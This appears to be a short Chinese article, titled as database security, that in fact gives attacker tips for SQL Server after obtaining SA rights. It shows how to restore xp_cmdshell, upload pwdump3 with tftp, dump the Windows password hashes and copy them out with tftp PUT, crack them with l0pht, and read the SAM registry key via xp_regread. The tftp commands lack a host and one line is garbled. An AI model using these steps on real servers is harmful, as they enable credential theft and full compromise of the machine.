調整重心 從IIS到SQL Server數據庫安全

解決數據庫的問題和技巧： 


1、獲得SA權限后，卻不能執行xp_cmdshell存儲過程怎么辦？ 

答：可能是已經把xp_cmdshell等擴展存儲過程刪除了，可以用這個存儲過程把xp_cmdshell恢復sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’。 

2、通過數據庫用pwdump獲得系統管理員密碼: 

先上傳一個pwdump： 


tftp -i GET pwdump3.exe pwdump3.exe 
tftp -i GET lsaext.dll lsaext.dll 
tftp -i GET pwservice.exe pwservice.exe 
pwdump3 127.0.0.1 outfile.txt 
tftp PUT outfile.txt outfile.txt
 

然后再用解密工具l0pht等等破解這些密碼。 


3、從數據庫讀取系統管理員密碼: 

能讀出加密的密碼是NT的“administrator”賬號也不能做的，SQL Server能讀出來是使用的“LocalSystem”賬號，這個賬號比administrator更高一級�？梢允褂孟旅孢@個存儲過程。不過讀出來的密碼是經過加密后的，然后再解密： 


xp_regread ’HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account’,’F’ 
  

文章來源于領測軟件測試網 http://www.kjueaiud.com/